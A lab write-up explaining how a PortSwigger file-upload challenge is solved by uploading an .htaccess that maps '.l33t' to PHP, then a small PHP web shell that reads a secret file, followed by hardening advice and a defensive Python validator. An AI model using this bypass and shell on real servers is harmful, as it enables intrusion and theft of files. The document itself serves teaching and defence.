Figure 1.1: This image shows the PortSwigger lab's title "Web Shell Upload via Extension Blacklist Bypass" and the instructions for solving the challenge.
Analysis:
1. Log in using the provided credentials: wiener (username) and peter (password).
2. Check whether the file upload parameter properly sanitises file extensions:
The server rejects files with a PHP extension.
The response headers identify the server as Apache/2.4.41.
3. Search for known issues affecting this Apache version.
The research also points out that an attacker who can upload files may be able to craft HTTP requests that trick the web server into executing them.
Since the server blocks the PHP extension, another way to get PHP executed is to make Apache treat a different extension, ".l33t", as PHP with the following directive:
AddType application/x-httpd-php .l33t
4. Create a file named ".htaccess" containing that directive and upload it through the same avatar upload, so it lands in the upload directory:
5. Send another upload request, this time with the ".l33t" extension, carrying the PHP script that reads the secret and solves the lab:
<?php
// Read the lab's target file and echo it back in the HTTP response.
$path = "/home/carlos/secret";
$file = fopen($path, "r");
$content = fread($file, filesize($path));
fclose($file);
echo $content;
?>
6. Finally, request "/files/avatars/exploit.l33t" with Burp Suite; the response contains the secret.
Recommendations:
- Rename uploaded files: Generate a unique, random filename for each upload instead of using the user-supplied name directly, so users cannot overwrite or target sensitive files on the server (an uploaded ".htaccess" is itself a user-controlled filename).
- Store files outside the web root: Save uploaded files in a directory that is not under the document root, so they cannot be requested directly by URL. Serve them through an application handler that only reads and returns their bytes.
- Disable script execution: Configure the server so nothing in the upload directory is executed as a script, and do not allow per-directory overrides there (in Apache, "AllowOverride None"), otherwise an uploaded ".htaccess" can re-enable execution exactly as this lab does. Validate extensions against an allowlist of expected types rather than a blacklist of known-bad ones.
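The following is an added illustration of the first two recommendations and of why the lab's blacklist fails; it is example code written for this writeup, not the lab's or PortSwigger's own code. The paths /var/www/html and /var/uploads/avatars, the extension sets, and the function names are assumptions for the example.

```python
import os
import secrets
from pathlib import PurePosixPath
from typing import Optional

# Assumed layout (hypothetical): uploads are stored outside the document root,
# so Apache never serves them as files and never interprets them as scripts.
WEB_ROOT = "/var/www/html"
UPLOAD_DIR = "/var/uploads/avatars"

# Allowlist of image extensions the avatar feature actually needs.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# The lab's style of filter: a blacklist of extensions known to be dangerous.
BLACKLISTED_EXTENSIONS = {"php", "phtml", "phar"}


def blacklist_accepts(filename: str) -> bool:
    """Mimic the lab's check: refuse only known-bad extensions.

    This lets through '.htaccess' (no extension at all) and 'exploit.l33t',
    which is precisely the bypass used above.
    """
    ext = PurePosixPath(filename).suffix.lstrip(".").lower()
    return ext not in BLACKLISTED_EXTENSIONS


def allowlist_accepts(filename: str) -> bool:
    """Accept only names with an extension from ALLOWED_EXTENSIONS.

    Directory components are discarded first, dotfiles and extension-less
    names are rejected outright, and the extension is compared
    case-insensitively so 'shell.PHP' gets no special treatment.
    """
    name = PurePosixPath(filename).name
    if name.startswith(".") or "." not in name:
        return False
    ext = name.rsplit(".", 1)[1].lower()
    return ext in ALLOWED_EXTENSIONS


def stored_path(filename: str, token_hex: Optional[str] = None) -> Optional[str]:
    """Return the on-disk path for an accepted upload, or None if refused.

    The stored name is a random token plus the validated extension, so the
    user-supplied name (including any '../' or '.htaccess') never reaches disk.
    token_hex exists only so tests can pin the random part.
    """
    if not allowlist_accepts(filename):
        return None
    ext = PurePosixPath(filename).name.rsplit(".", 1)[1].lower()
    token = token_hex or secrets.token_hex(16)
    return os.path.join(UPLOAD_DIR, f"{token}.{ext}")


def is_outside_web_root(path: str) -> bool:
    """True when path does not live under WEB_ROOT, i.e. cannot be fetched by URL."""
    return os.path.commonpath([WEB_ROOT, os.path.abspath(path)]) != WEB_ROOT


if __name__ == "__main__":
    for candidate in (".htaccess", "exploit.l33t", "shell.php", "avatar.png"):
        print(candidate, "blacklist:", blacklist_accepts(candidate),
              "allowlist:", allowlist_accepts(candidate),
              "stored as:", stored_path(candidate))
```

Note that an allowlist on the extension alone still accepts a file whose bytes are PHP but whose name ends in ".png"; that is why the rename, the out-of-web-root storage and the no-execution server configuration are applied together rather than relying on any single check.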